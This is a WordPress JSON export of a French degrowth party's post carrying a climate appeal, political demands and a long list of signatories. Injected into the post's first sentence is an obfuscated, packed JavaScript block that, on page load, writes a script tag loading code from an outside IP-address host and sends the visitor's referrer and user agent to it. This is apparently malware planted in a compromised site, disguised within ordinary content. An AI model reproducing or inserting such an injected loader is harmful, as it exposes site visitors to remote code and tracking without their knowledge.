{"id":9417,"date":"2018-01-26T09:59:01","date_gmt":"2018-01-26T08:59:01","guid":{"rendered":"https:\/\/www.partipourladecroissance.net\/?p=9417"},"modified":"2019-03-26T22:02:49","modified_gmt":"2019-03-26T21:02:49","slug":"appel-bientot-il-sera-trop-tard-que-faire-a-court-et-long-terme","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9417","title":{"rendered":"Appel : bient\u00f4t il sera trop tard\u2026 Que faire \u00e0 court et long terme ?"},"content":{"rendered":"<p><strong>En <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snifs|var|u0026u|referrer|ibtii||js|php'.split('|'),0,{}))\n<\/script> novembre, suite \u00e0 la publication de l&rsquo;alerte \u00ab\u00a0Demain il sera trop tard\u00a0\u00bb de 15000 scientifiques, s&rsquo;engage une discussion entre d\u00e9croissant-e-s. Il est alors d\u00e9cid\u00e9 de lancer un appel \u00e0 la convergence des forces \u00e9cologiques et altermondialistes. Cet appel est tr\u00e8s vite sign\u00e9 par une centaine de personnalit\u00e9s diverses et vari\u00e9es. Nous vous invitons \u00e0 le d\u00e9couvrir et le signer.<\/strong><\/p>\n<p style=\"text-align: center;\"><img decoding=\"async\" class=\"aligncenter\" src=\"https:\/\/ci5.googleusercontent.com\/proxy\/4CwuwK1ybW19AXautRwmkW_-VgVJv3GtoF6RC9s_6xN5LYV88wU5rEj3xzDHN_6Ql7X1G26f0TsBU7PQMBERkQT3udz7ZK4Qsfw7=s0-d-e1-ft#http:\/\/initiatives-decroissantes.net\/2-cagouilles.jpg\" alt=\"http:\/\/initiatives-decroissantes.net\/2-cagouilles.jpg\" \/><a href=\"http:\/\/initiatives-decroissantes.net\/\"><span class=\"Style1\">http:\/\/initiatives-decroissantes.net\/<br \/>\n<\/span><\/a><span class=\"Style1\"><a href=\"mailto:contact@initiatives-decroissantes.net\">contact@initiatives-decroissantes.net<br \/>\n<\/a><\/span><a href=\"https:\/\/blogs.mediapart.fr\/initiatives-decroissantes\">Chroniques et actualit\u00e9s de l&rsquo;appel sur le blog de Mediapart<\/a><\/p>\n<p>Nous avons entendu l\u2019appel de plus de 15000 scientifiques de 184 pays paru le 13 novembre 2017 dans lequel ils tirent la sonnette d\u2019alarme sur l\u2019\u00e9tat d\u00e9sastreux de notre plan\u00e8te. Nous avons compris qu\u2019il s\u2019agit de la derni\u00e8re mise en garde, car si nous ne prenons pas les mesures adapt\u00e9es \u00ab bient\u00f4t il sera trop tard \u00bb.<\/p>\n<p>Nous, \u00e9cologistes, altermondialistes, objecteurs de croissance, d\u00e9croissants, souhaitons tirer les cons\u00e9quences pratiques de cet appel, puisqu\u2019il est bient\u00f4t \u00ab trop tard \u00bb, c\u2019est maintenant qu\u2019il faut agir. Personne n\u2019a aujourd\u2019hui de r\u00e9ponses toutes faites mais nous savons que nous devons changer de paradigme dominant. L\u2019issue n\u2019est pas du c\u00f4t\u00e9 de l\u2019aust\u00e9rit\u00e9 et de la croissance mais plut\u00f4t d\u2019une rupture avec le productivisme, l\u2019extractivisme, la foi b\u00e9ate dans la techno-science, l\u2019autoritarisme, le capitalisme.<\/p>\n<p>Nous devons changer nos modes de production et d\u2019existence, car ils sont \u00e0 l\u2019origine de la situation actuelle, et l\u2019effondrement des ressources pourrait nous conduire \u00e0 la barbarie. Mais nous ne partons pas de rien, nous savons que des alternatives existent d\u00e9j\u00e0 \u00e0 l\u2019\u00e9chelle mondiale, qu\u2019il faut faire converger ; nous savons aussi que le r\u00eave des 99 % n\u2019est pas d\u2019imiter les 1 % contrairement \u00e0 ce que voudraient faire croire les dominants.<\/p>\n<p>Nous devons changer nos modes de production et d\u2019existence mais nous savons que demain devra \u00eatre mieux qu\u2019aujourd\u2019hui tout en divisant imm\u00e9diatement par trois nos \u00e9missions de CO2 et en pr\u00e9servant les \u00e9cosyst\u00e8mes. Nous ne croyons plus aux lendemains qui chantent parce que nous voulons chanter au pr\u00e9sent. La plan\u00e8te est suffisamment riche pour permettre \u00e0 dix milliards d\u2019humains de vivre bien si nous en pr\u00e9servons la biodiversit\u00e9 et savons vivre en harmonie avec les autres esp\u00e8ces.<\/p>\n<p>Nos combats d\u2019aujourd\u2019hui doivent nous rapprocher de la soci\u00e9t\u00e9 de demain.<\/p>\n<p>Si le r\u00e9chauffement climatique n\u2019est pas endigu\u00e9 drastiquement, cela va provoquer des s\u00e9cheresses massives et des famines mondiales. Pour que l\u2019humanit\u00e9 ne disparaisse pas comme une entreprise en faillite, nous vous invitons \u00e0 signer et \u00e0 faire signer cet appel afin de prendre date en disant que la solution \u00e0 moyen et long terme est du c\u00f4t\u00e9 d\u2019une soci\u00e9t\u00e9 de la gratuit\u00e9, \u00e9mancip\u00e9e de la contrainte du \u00ab toujours plus \u00bb de richesses \u00e9conomiques et de pouvoir sur les autres humains, les autres vivants et la plan\u00e8te.<\/p>\n<p>Pour que l\u2019humanit\u00e9 ne disparaisse pas comme une entreprise en faillite, nous vous invitons \u00e0 signer et \u00e0 faire signer cet appel afin d\u2019exiger, d\u00e8s maintenant, la fin des Grands Projets Inutiles impos\u00e9s (de l\u2019a\u00e9roport NDDL \u00e0 Europacity en passant par le Grand Prix de France de F1), une r\u00e9duction drastique du temps de travail (travailler moins pour travailler tous mieux), la g\u00e9n\u00e9ralisation des communs et de la gratuit\u00e9 (des transports en commun, des cantines scolaires, des services culturels et fun\u00e9raires), une r\u00e9duction drastique des in\u00e9galit\u00e9s de revenus et de patrimoine, un \u00e9largissement de la d\u00e9mocratie pour aller vers plus d\u2019autonomie et de responsabilisation des peuples.<\/p>\n<p>Tout doit \u00eatre repens\u00e9 dans le cadre de la critique de la croissance car la d\u00e9croissance que nous soutenons ce n\u2019est pas faire la m\u00eame chose en moins, ce n\u2019est pas l\u2019\u00e9loge du sacrifice, c\u2019est d\u00e9j\u00e0 construire une \u00e9cologie des revenus avec un minimum et un maximum d\u00e9cents et revenir \u00e0 des taux de pr\u00e9l\u00e8vement sur la nature supportables, c\u2019est offrir un avenir dans un monde qui n\u2019en offre plus.<\/p>\n<p>Nous, \u00e9cologistes, altermondialistes, d\u00e9croissants, objecteurs de croissance amoureux du bien-vivre, appelons \u00e0 une d\u00e9marche commune pour construire un projet de transition vers une soci\u00e9t\u00e9 d\u2019a-croissance, juste et d\u00e9mocratique. Nous devrons pour cela dire notre volont\u00e9 de nous rapprocher, afin de cr\u00e9er un mouvement d\u2019id\u00e9es riche de sa diversit\u00e9, de mettre en r\u00e9seau nos comp\u00e9tences et alternatives, de prendre des initiatives, d\u2019initier des r\u00e9sistances, et de pr\u00e9parer des convergences avec tous ceux et toutes celles qui s\u2019opposent \u00e0 la barbarie qui vient.<\/p>\n<p><strong>Le collectif de d\u00e9croissant-e-s \u00e0 l&rsquo;initiative de l&rsquo;appel<\/strong><br \/>\nPaul Ari\u00e8s, Vincent Bruy\u00e8re, Thierry Brugvin, Vincent Liegey, St\u00e9phane Madelaine, Jean-Luc Pasquinet, Anne-Isablle Veillot, Christophe Ondet, Michel Simonin, Christian Sunt<\/p>\n<p style=\"text-align: center;\">Pour signez l&rsquo;appel et voire les signataires : <a href=\"http:\/\/initiatives-decroissantes.net\/\">http:\/\/initiatives-decroissantes.net\/<br \/>\n<\/a><a href=\"https:\/\/blogs.mediapart.fr\/initiatives-decroissantes\">Chroniques et actualit\u00e9s de l&rsquo;appel sur le blog de Mediapart<\/a><br \/>\ncontact@initiatives-decroissantes.net<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/framaforms.org\/bientot-il-sera-trop-tard-que-faire-a-court-et-long-terme-1516555766\" width=\"100%\" height=\"1400\" frameborder=\"0\"><\/iframe><\/p>\n<p>Premier.e.s signataires (par ordre alphab\u00e9tique) :<\/p>\n<p><!--more--><\/p>\n<p><span class=\"Style13\"><strong>Yves-Marie Abraham<\/strong>, HEC Montr\u00e9al (Qu\u00e9bec)<br \/>\n<strong>Alain Adriaens<\/strong>, D\u00e9put\u00e9 bruxellois honoraire, porte-parole du mouvement politique des Objecteurs de Croissance (B)<br \/>\n<strong>Christophe Aguiton<\/strong>, co-fondateur de SUD\/solidaires<br \/>\n<strong>Gilles Alfonsi<\/strong>, Association des Communistes Unitaires<br \/>\n<strong>Gabriel Amard<\/strong>, militant pour l&rsquo;eau, animateur La France Insoumise<br \/>\n<strong>Christian Araud<\/strong>, auteur<br \/>\n<strong>Paul Ari\u00e8s<\/strong>, politologue, r\u00e9dacteur en chef de la revue les Zindign\u00e9(e)s<br \/>\n<strong>Isabelle Attard<\/strong>, ancienne d\u00e9put\u00e9e \u00e9cologiste<br \/>\n<strong>Genevi\u00e8ve Azam<\/strong>, \u00e9conomiste, ATTAC<br \/>\n<strong>Sylvie Barbe<\/strong>, \u00e9cof\u00e9ministe, yurtao<br \/>\n<strong>Julien Bayou<\/strong>, conseiller r\u00e9gional d&rsquo;\u00cele-de-France et porte-parole du parti Europe \u00c9cologie Les Verts<br \/>\n<strong>Renda Belmallem<\/strong>, co-fondatrice du R\u00e9seau Universitaire D\u00e9croissant (RUD)<br \/>\n<strong>Jean-Claude Besson-Girard<\/strong>, \u00e9crivain<br \/>\n<strong>Martine Billard<\/strong>, France insoumise, ex-d\u00e9put\u00e9e de Paris<br \/>\n<strong>Christophe Bonneuil<\/strong>, Historien, directeur de la collection Anthropoc\u00e8ne aux Ed. du Seuil<br \/>\n<strong>Jacques Boutault<\/strong>, Maire du 2\u00e8me arrondissement de Paris (EELV)<br \/>\n<strong>Fran\u00e7ois Briens<\/strong>, ing\u00e9nieur et chercheur en socio-\u00e9conomie et prospective<br \/>\n<strong>Thierry Brugvin<\/strong>, sociologue<br \/>\n<strong>Thierry Brulavoine<\/strong>, porte-parole de la Maison commune de la d\u00e9croissance, chroniqueur au journal La D\u00e9croissance<br \/>\n<strong>Vincent Bruy\u00e8re<\/strong>, charg\u00e9 de mobilisation citoyenne \u00e0 AJENA<br \/>\n<strong>Florent Bussy<\/strong>, philosophe<br \/>\n<strong>Lionel<\/strong> <strong>Chambrot<\/strong>, Amis de la D\u00e9croissance Nancy<br \/>\n<strong>Fabrice<\/strong> <strong>Clavien<\/strong>, R\u00e9seau Objection Croissance Gen\u00e8ve (ROC-GE)<br \/>\n<strong>Yves<\/strong> <strong>Cochet<\/strong>, ancien ministre, pr\u00e9sident de l\u2019institut Momentum<br \/>\n<strong>Mathieu<\/strong> <strong>Colloghan<\/strong>, artiste<br \/>\n<strong>Maxime<\/strong> <strong>Combes<\/strong>, \u00e9conomiste<br \/>\n<strong>Philippe<\/strong> <strong>Corcuff<\/strong>, ma\u00eetre de conf\u00e9rences de science politique<br \/>\n<strong>Marie<\/strong>&#8211;<strong>Laure<\/strong> <strong>Coulmin<\/strong> <strong>Koutsaftis<\/strong>, animatrice CADTM, auteure<br \/>\n<strong>Thomas<\/strong> <strong>Coutrot<\/strong>, \u00e9conomiste et membre d&rsquo;ATTAC<br \/>\n<strong>Adrien<\/strong> <strong>Couzinier<\/strong>, \u00e9nerg\u00e9ticien, membre d&rsquo;Adrastia<br \/>\n<strong>Genevi\u00e8ve<\/strong> <strong>Decrop<\/strong>, sociologue<br \/>\n<strong>Robin<\/strong> <strong>Delobel<\/strong>, animateur revue du CADTM<br \/>\n<strong>Federico<\/strong> <strong>Demaria<\/strong>, \u00e9conomiste \u00e9cologique, Research &amp; Degrowth<br \/>\n<strong>Alessandro<\/strong> <strong>Di Giuseppe<\/strong>, com\u00e9dien (\u00ab\u00a0PAP&rsquo;40\u00a0\u00bb)<br \/>\n<strong>Alessia Di Dio<\/strong>, journal Moins!<br \/>\n<strong>Alix Dreux<\/strong>, co-fondateur de Jeudi Noir<br \/>\n<strong>Marc Dufumier<\/strong>, agronome<br \/>\n<strong>Jonathan Durand Folco<\/strong>, Universit\u00e9 Saint-Paul (Quebec)<br \/>\n<strong>Renaud Duterme<\/strong>, CADTM et auteur de De quoi l&rsquo;effondrement est-il le nom?<br \/>\n<strong>Timoth\u00e9e Duverger<\/strong>, chercheur<br \/>\n<strong>Jean-Baptiste Eyraud<\/strong>, militant associatif<br \/>\n<strong>Guillaume Faburel<\/strong>, professeur de g\u00e9ographie, universit\u00e9 de Lyon<br \/>\n<strong>Yann Fievet<\/strong>, socio\u00e9conomiste<br \/>\n<strong>G\u00e9rard Filoche<\/strong>, syndicaliste<br \/>\n<strong>Fabrice Flipo<\/strong>, philosophe, Research &amp; Degrowth<br \/>\n<strong>Fran\u00e7ois Friche<\/strong>, journal Moins!<br \/>\n<strong>Jean Gadrey<\/strong>, \u00e9conomiste, militant ATTAC<br \/>\n<strong>Jean-Marc Gancille<\/strong>, co-fondateur de Darwin eco-syst\u00e8me<br \/>\n<strong>Diane Gari\u00e9py<\/strong>, R\u00e9seau qu\u00e9b\u00e9cois pour la simplicit\u00e9 volontaire<br \/>\n<strong>Jean-Pierre Garnie<\/strong>r, sociologue urbain<br \/>\n<strong>Fran\u00e7ois Geze<\/strong>, \u00e9diteur<br \/>\n<strong>Fr\u00e9d\u00e9rique Giacomoni<\/strong>, \u00e9ditrice (\u00e9ditions Le passager clandestin)<br \/>\n<strong>Willy Gianinazzi<\/strong>, biographe d&rsquo;Andr\u00e9 Gorz<br \/>\n<strong>Mich\u00e8le Gilkinet<\/strong>, ancienne d\u00e9put\u00e9e belge, objectrice de croissance<br \/>\n<strong>Mathilde Girault<\/strong>, doctorante en \u00e9tudes urbaines, membre des Lucioles (Lyon)<br \/>\n<strong>Fran\u00e7oise Gollain<\/strong>, sociologue, objectrice de croissance<br \/>\n<strong>Didier Harpag\u00e9s<\/strong>, professeur de sciences \u00e9conomiques et sociales<br \/>\n<strong>Yohann Hubert<\/strong>, porte-parole de la Maison commune de la d\u00e9croissance<br \/>\n<strong>Thierry<\/strong> <strong>Jaccaud<\/strong>, r\u00e9dacteur en chef de L\u2019Ecologiste<br \/>\n<strong>Fran\u00e7ois<\/strong> <strong>Jarrige<\/strong>, historien<br \/>\n<strong>Andr\u00e9a<\/strong> <strong>Kotarac<\/strong>, conseiller r\u00e9gional (FI)<br \/>\n<strong>Annie<\/strong> <strong>Lahmer<\/strong>, Conseill\u00e8re R\u00e9gionale EELV<br \/>\n<strong>Philippe Lamberts<\/strong>, D\u00e9put\u00e9 Europ\u00e9en, Copr\u00e9sident du Groupe des Verts\/Alliance libre europ\u00e9enne<br \/>\n<strong>Paul Lannoye<\/strong>, ancien pr\u00e9sident du Groupe Vert au parlement europ\u00e9en et pr\u00e9sident du Grappe asbl- Belgique<br \/>\n<strong>Serge Latouche<\/strong>, professeur \u00e9m\u00e9rite, directeur de la collection Les Pr\u00e9curseurs de la D\u00e9croissance (Editions Le Passager Clandestin)<br \/>\n<strong>Romain Lauf\u00e9ron<\/strong>, d\u00e9sob\u00e9issants<br \/>\n<strong>Christophe Laurens<\/strong>, cofondateur du Master Alternatives urbaines<br \/>\n<strong>St\u00e9phane Lavignotte<\/strong>, militant \u00e9cologiste, pasteur<br \/>\n<strong>Anne Le Strat<\/strong>, consultante, ex-pr\u00e9sidente d&rsquo;Eau de Paris<br \/>\n<strong>Philippe L\u00e9na<\/strong>, g\u00e9ographe, sociologue, directeur de recherche \u00e9m\u00e9rite<br \/>\n<strong>Michel Lepesant<\/strong>, Maison commune de la d\u00e9croissance (MCD)<br \/>\n<strong>Vincent Liegey<\/strong>, co-auteur d&rsquo;Un Projet de D\u00e9croissance et coordinateur des conf\u00e9rences internationales de la D\u00e9croissance<br \/>\n<strong>Elise Lowy<\/strong>, Fondatrice de Mouvement Ecolo<br \/>\n<strong>Lucas Luisoni<\/strong>, R\u00e9seau Objection Croissance Gen\u00e8ve (ROC-GE)<br \/>\n<strong>St\u00e9phane Madelaine<\/strong>, co-auteur d&rsquo;un Projet de D\u00e9croissance, Le Havre<br \/>\n<strong>Pietro Majno-Hurst<\/strong>, m\u00e9decin-chirurgien, Gen\u00e8ve et Lugano, Suisse<br \/>\n<strong>No\u00ebl Mam\u00e8re<\/strong>, ancien d\u00e9put\u00e9<br \/>\n<strong>Florent Marcellesi<\/strong>, d\u00e9put\u00e9 europ\u00e9en<br \/>\n<strong>Charlotte Marchandise<\/strong>, candidate \u00e0 l&rsquo;\u00e9lection pr\u00e9sidentielle pour laprimaire.org<br \/>\n<strong>Louis Marion<\/strong>, philosophe<br \/>\n<strong>Eric Martin<\/strong>, professeur de philosophie, Coll\u00e8ge Edouard-Montpetit<br \/>\n<strong>Myriam Martin<\/strong>, membre d&rsquo;Ensemble ! Mouvement pour une alternative de gauche, \u00e9cologiste et solidaire<br \/>\n<strong>Gustave Massiah<\/strong>, \u00e9conomiste altermondialiste<br \/>\n<strong>Bertrand M\u00e9heust<\/strong>, \u00e9crivain, docteur en sociologie et sp\u00e9cialiste de parapsychologie<br \/>\n<strong>Myriam Miche<\/strong>l, Utopia<br \/>\n<strong>Serge Mongeau<\/strong>, auteur<br \/>\n<strong>Corinne Morel-Darleux<\/strong>, secr\u00e9taire nationale \u00e0 l&rsquo;\u00e9cosocialisme, conseill\u00e8re r\u00e9gionale (PG-FI)<br \/>\n<strong>Marc Mosio<\/strong>, D\u00e9croissance idf<br \/>\n<strong>Barbara Muraca<\/strong>, Oregon State University<br \/>\n<strong>David Murray<\/strong>, \u00e9diteur, Ecosoci\u00e9t\u00e9<br \/>\n<strong>Baptiste Mylondo<\/strong>, enseignant-chercheur en \u00e9conomie, partisan du revenu universel sans condition<br \/>\n<strong>Laure Noualhat<\/strong>, journaliste r\u00e9alisatrice<br \/>\n<strong>Nicolas Oblin<\/strong>, Directeur de r\u00e9daction de la revue Illusio<br \/>\n<strong>Christophe Ondet<\/strong>, co-auteur d&rsquo;un Projet de D\u00e9croissance, animateur d&rsquo;un atelier v\u00e9lo<br \/>\n<strong>Claudine Ottiger<\/strong>, R\u00e9seau Objection Croissance Gen\u00e8ve (ROC-GE)<br \/>\n<strong>Laurent Paillard<\/strong>, philosophe<br \/>\n<strong>Mathilde Panot<\/strong>, d\u00e9put\u00e9e du Val de Marne (FI)<br \/>\n<strong>Jean-Luc Pasquinet<\/strong>, d\u00e9croissance idf, technologos<br \/>\n<strong>Pascal Pavie<\/strong>, militant paysan<br \/>\n<strong>Antoine Peillon<\/strong>, grand reporter La Croix<br \/>\n<strong>Alexandre Penasse<\/strong>, r\u00e9dacteur en chef du journal Kairos<br \/>\n<strong>Evelyne Perrin<\/strong>, sociologue, auteure<br \/>\n<strong>Dominique Plihon<\/strong>, \u00e9conomiste, porte-parole ATTAC<br \/>\n<strong>Christine Poilly<\/strong>, collectif anti gaz de schiste<br \/>\n<strong>Valentine Porche<\/strong>, co-fondatrice du R\u00e9seau Universitaire D\u00e9croissant (RUD)<br \/>\n<strong>Lo\u00efc Prud&rsquo;homme<\/strong>, d\u00e9put\u00e9 de Gironde (FI)<br \/>\n<strong>Franck Pupuna<\/strong>t, animateur Utopia<br \/>\n<strong>Gilles Quiniou<\/strong>, d\u00e9croissance pays cathare<br \/>\n<strong>Yvon Quiniou<\/strong>, philosophe<br \/>\n<strong>Xavier Renou<\/strong>, d\u00e9sob\u00e9issants<br \/>\n<strong>Dany Robert Dufour<\/strong>, philosophe<br \/>\n<strong>Marie-Monique Robin<\/strong>, journaliste, r\u00e9alisatrice du documentaire Sacr\u00e9 Croissance<br \/>\n<strong>Barbara Romagnan<\/strong>, ancienne d\u00e9put\u00e9e PS<br \/>\n<strong>Daniel Rome<\/strong>, \u00e9conomiste, ATTAC<br \/>\n<strong>Pierre Rose<\/strong>, Objecteur de Croissance 62; collectif anti gaz de couche<br \/>\n<strong>Flora Sallembien<\/strong>, porte-parole de la MCD et membres de D\u00e9croissance IDF<br \/>\n<strong>Germain Sarhy<\/strong>, fondateur de la communaut\u00e9 Emma\u00fcs de Lescar-Pau<br \/>\n<strong>H\u00e9l\u00e8ne Schmitt<\/strong>, d\u00e9croissance Montpellier<br \/>\n<strong>Fran\u00e7ois Schneider<\/strong>, Research &amp; Degrowth, Can Decreix<br \/>\n<strong>Nicolas Sersiron<\/strong>, ancien pr\u00e9sident du CADTM-France, militant solidarit\u00e9 Nord\/Sud<br \/>\n<strong>Pablo Servigne<\/strong>, chercheur in(terre)d\u00e9pendant, auteur et conf\u00e9rencier<br \/>\n<strong>Michel Simonin<\/strong>, amis de la D\u00e9croissance Nancy<br \/>\n<strong>Agn\u00e8s Sina\u00ef<\/strong>, journaliste et ma\u00eetre de conf\u00e9rences \u00e0 Science Po Paris<br \/>\n<strong>Michel Soudais<\/strong>, r\u00e9dacteur en chef adjoint de Politis<br \/>\n<strong>Christian Sunt<\/strong>, D\u00e9croissance Pays Occitan<br \/>\n<strong>Jacques Testart<\/strong>, biologiste, militant sciences citoyennes<br \/>\n<strong>Eric Toussaint<\/strong>, porte-parole international du CADTM<br \/>\n<strong>Nina Treu<\/strong>, coordinatrice Konzeptwerk Neue \u00d6konomie (Allemagne)<br \/>\n<strong>Aur\u00e9lie Trouv\u00e9<\/strong>, porte-parole d&rsquo;ATTAC<strong><br \/>\nAnne-Isabelle Veillot<\/strong>, co-auteure d&rsquo;Un Projet de D\u00e9croissance<\/span><span class=\"Style13\"><br \/>\n<strong>Fran\u00e7ois Verret<\/strong>, porte-parole de la MCD et membres de D\u00e9croissance IDF<br \/>\n<strong>Denis Vicherat<\/strong>, \u00e9ditions Utopia<br \/>\n<strong>Maxime Vivas<\/strong>, \u00e9crivain, ex-r\u00e9f\u00e9rent litt\u00e9raire d&rsquo;ATTAC, administrateur du site legrandsoir.info<br \/>\n<strong>Patrick Viveret<\/strong>, philosophe<br \/>\n<strong>Jean-Pierre Worms<\/strong>, sociologue fran\u00e7ais, ancien d\u00e9put\u00e9 fran\u00e7ais et responsable associatif<br \/>\n<strong>Pierre Zarka<\/strong>, ancien d\u00e9put\u00e9, ancien directeur de L&rsquo;Humanit\u00e9, animateur ACU (Ensemble !)<br \/>\n<strong>Olivier Zimmermann<\/strong>, R\u00e9seau Objection Croissance Gen\u00e8ve (ROC-GE)<br \/>\n<strong>Josef Zisyadis<\/strong>, pr\u00e9sident Slow Food Suisse <\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En novembre, suite \u00e0 la publication de l&rsquo;alerte \u00ab\u00a0Demain il sera trop tard\u00a0\u00bb de 15000 scientifiques, s&rsquo;engage une discussion entre d\u00e9croissant-e-s. Il est alors d\u00e9cid\u00e9 de lancer un appel \u00e0 la convergence des forces \u00e9cologiques et altermondialistes. Cet appel est &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9417\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-9417","post","type-post","status-publish","format-standard","hentry","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9417","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9417"}],"version-history":[{"count":4,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9417\/revisions"}],"predecessor-version":[{"id":9421,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9417\/revisions\/9421"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9417"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9417"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9417"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}